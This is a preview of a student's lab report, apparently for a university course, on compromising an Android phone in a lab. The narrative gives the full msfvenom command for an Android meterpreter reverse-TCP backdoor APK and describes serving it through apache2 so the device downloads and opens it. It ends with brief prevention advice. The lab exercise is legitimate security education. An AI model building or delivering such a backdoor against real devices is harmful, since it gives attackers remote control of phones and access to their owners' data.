4.3 CIS411 PA

docx

School

ECPI University, Manassas *

*We aren’t endorsed by this school

Course

411

Subject

Computer Science

Date

Jan 9, 2024

Type

docx

Pages

6

Uploaded by sidorelakollcaku

Report
Nadia Avdiu CIS 411 Professor Wilent Date 1-17-2023 4.3 Performance Assessment Hacking Mobile Devices a. Using any of the tools available on the ParrotOS virtual machine, perform attack on the Android phone using msfvenom to create a payload. Provide screenshot of payload creation on ParrotOS b. Create a web server on Parrot OS apache2 to deliver the msfvenom exploit document this screenshot once completed.
C. Provide a screenshot of the Android OS while the msfvenom exploit is installed
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help
d. Provide a screenshot of the Android system once it has been compromised, explain the tools that are available using Metasploit.
e. Explain in a narrative the overall process of how you used the resources and tools to gain access to the Android Phone as well as how to prevent future attacks on the Android phone platform. The first thing is did in was to start PostgreSQL service in the Parrot OS. I then used msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik
LHOST=172.31.0.3 R > Desktop/Backdoor.apk to generate a backdoor application into the Desktop directory using the Parrot OS IP as the LHOST IP. Then I used apache2 to start the Apache web server. I then copied the backdoor.apk into a share folder in /var/www/html. Then I used apache2 to start the Apache web server. Then going into the Android device, I accessed the web server and downloaded the backdoor.apk which when opened, gave direct access to the device from the Parrot OS. At this point I was able to retrieve data from the Android device like: system info, ip configurations, the working directory, and ability to access folders. For the future, I would recommend to only download apps from trusted apps, and use high level authentication.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help